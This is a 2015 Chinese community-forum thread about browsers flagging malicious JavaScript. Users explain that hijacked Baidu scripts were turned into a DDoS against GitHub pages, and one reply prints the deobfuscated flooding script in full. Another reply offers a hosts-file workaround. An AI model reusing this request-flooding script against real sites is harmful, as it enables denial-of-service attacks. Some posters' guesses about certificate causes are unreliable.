新西兰天维网社区

标题: ~更新~F··K 电脑被僵尸了··· [打印本页]

作者: mumu1211 时间: 2015-4-6 15:08:01 标题: ~更新~F··K 电脑被僵尸了···

本帖最后由 mumu1211 于 2015-4-11 16:29 编辑

最近有没有人电脑被僵尸了？
电脑一开网页一直都报warning malicious javascript detected on this domain！
youtube也被forbidden了···郁闷···

------------------------------------------华丽分割-----------------------------------
看见也有好多的人和我一样，在此说个解决办法，但不能保证都能解决···
C:\Windows\System32\drivers\etc
路径下找到hosts  用记事本打开加入以下
  127.0.0.1 hm.baidu.com
  127.0.0.1 cbjs.baidu.com
  127.0.0.1 dup.baidustatic.com

保存退出···

作者: Moosen 时间: 2015-4-6 15:12:10

作者: wendy20115 时间: 2015-4-6 15:13:58

有哎，我们的电脑也经常出现同样的字幕

作者: 863364 时间: 2015-4-6 15:20:44

我的手机里英文词典也这样，啥意思啊？

作者: panteris 时间: 2015-4-6 15:29:14

恭喜楼上几位，你们都被GFW当做肉鸡攻击Github了。
关于我党下作的细节，请自行搜索 ’GFW JavaScript 劫持‘

作者: BING8800 时间: 2015-4-6 15:39:06

我的也是这样。两天前开始的

作者: 桜の栞 时间: 2015-4-6 15:41:26

OMG, 我的也是這樣......

作者: BING8800 时间: 2015-4-6 15:41:41

有解决的办法吗？

作者: ~浪漫满屋~ 时间: 2015-4-6 15:44:23

me too~~~~~~~~~ no idea

作者: 孤独的单机 时间: 2015-4-6 16:11:05

google一下。。原来我也变成肉鸡了
这里提到了一个解决办法

https://pao-pao.net/article/404

作者: skywindcn 时间: 2015-4-6 17:55:47

孤独的单机发表于 2015-4-6 16:11
google一下。。原来我也变成肉鸡了
这里提到了一个解决办法

禁用baidu js这招有点无奈，连baidu都没法正常使用了...

作者: bintoo 时间: 2015-4-6 18:02:19

怎样变肉机的？这种事怎么我从来都遇不到？

作者: joyclover 时间: 2015-4-6 18:23:23

一看百度就出现………我也是……什么原因？

作者: 袏佑吥吩 时间: 2015-4-6 18:57:24

WTF 我的电脑也有我还在想是怎么回事呢 ~~~~~·

作者: MSSA 时间: 2015-4-6 19:58:16

document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;

function unixtime() {
var a = new Date;
return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;

function r_send2() {
var a = unixtime() % NUM;
get(url_array[a])
}

function get(a) {
var b;
$.ajax({
      url: a,
      dataType: "script",
      timeout: 1E4,
      cache: !0,
      beforeSend: function() {
         requestTime = (new Date).getTime()
      },
      complete: function() {
         responseTime = (new Date).getTime();
         b = Math.floor(responseTime - requestTime);
         3E5 > responseTime - startime && (r_send(b), count += 1)
      }
})
}

function r_send(a) {
setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);

上面是用来攻击的JavaScript，原始脚本被obfuscate过了，用beautifier还原就可以。
没啥特殊的就是个Ajax请求而已,从两个url里面随机选一个。

作者: skywindcn 时间: 2015-4-6 20:03:19

应该让百度把所有js都给加密了！

作者: mumu1211 时间: 2015-4-7 09:09:08

以前都说DDOS，从来没见过真的···
现在直接就被当枪使了，感觉是亲自参与啊···
感觉屌屌的有没有~

作者: 影子歌 时间: 2015-4-7 12:12:41

上次看球赛一直跳出来，最后关机睡觉

作者: JUNGLEXIA 时间: 2015-4-7 12:41:59

擦，还以为某个网站有问题
原来我也中招了

作者: yellowp 时间: 2015-4-7 18:40:53

大概是因为googl等一些浏览器不承认中国安全机构发布的证书，才跳出这些提示。

作者: Miraclman 时间: 2015-4-8 02:01:45

我也有，感觉就是最近2周内电脑出现的情况，到底是怎么回事？

作者: mumu1211 时间: 2015-4-8 09:26:42

Miraclman 发表于 2015-4-8 03:01
我也有，感觉就是最近2周内电脑出现的情况，到底是怎么回事？

有一帮狂人劫持境外的或是国内翻墙的电脑进行了几次DDOS攻击，DDOS不懂得Google~

作者: AUGUSTUS 时间: 2015-4-8 09:49:11

這個......好複雜啊

作者: 楼主 时间: 2015-4-8 10:30:10

不明觉厉！！！

作者: yellowp 时间: 2015-4-8 15:44:17

大概是因为googl等一些浏览器不承认中国安全机构发布的证书，才跳出这些提示。

作者: sznz168 时间: 2015-4-8 22:12:25

yellowp 发表于 2015-4-8 16:44
大概是因为googl等一些浏览器不承认中国安全机构发布的证书，才跳出这些提示。 ...

正解,主要是一些国内的网站

作者: yellowp 时间: 2015-4-9 13:29:13

。。。。。。。。。

作者: 狂风暴雨 时间: 2015-4-9 21:37:21

我的电脑从昨天开始也这样,什么情况?

作者: 美食小助手 时间: 2015-4-10 11:58:03

panteris 发表于 2015-4-6 15:29
恭喜楼上几位，你们都被GFW当做肉鸡攻击Github了。
关于我党下作的细节，请自行搜索 ’GFW JavaScript 劫持 ...

正解！！！！

作者: panteris 时间: 2015-4-10 18:29:16

sznz168 发表于 2015-4-8 22:12
正解,主要是一些国内的网站

错，这次是JS劫持，并不是因为CNNIC颁发的根证书不被信任的原因（CNNIC这个垃圾的事迹可以自行google）。
如果是因为证书，google会给你个大红页，然后提示此网站的根证书不被信任，让你选择是继续访问还是闪人。

作者: amy.zyx 时间: 2015-4-10 18:40:02

how to solve this

作者: 344762051 时间: 2015-4-10 22:26:20

该怎么办？

欢迎光临新西兰天维网社区 (http://bbs.skykiwi.com/)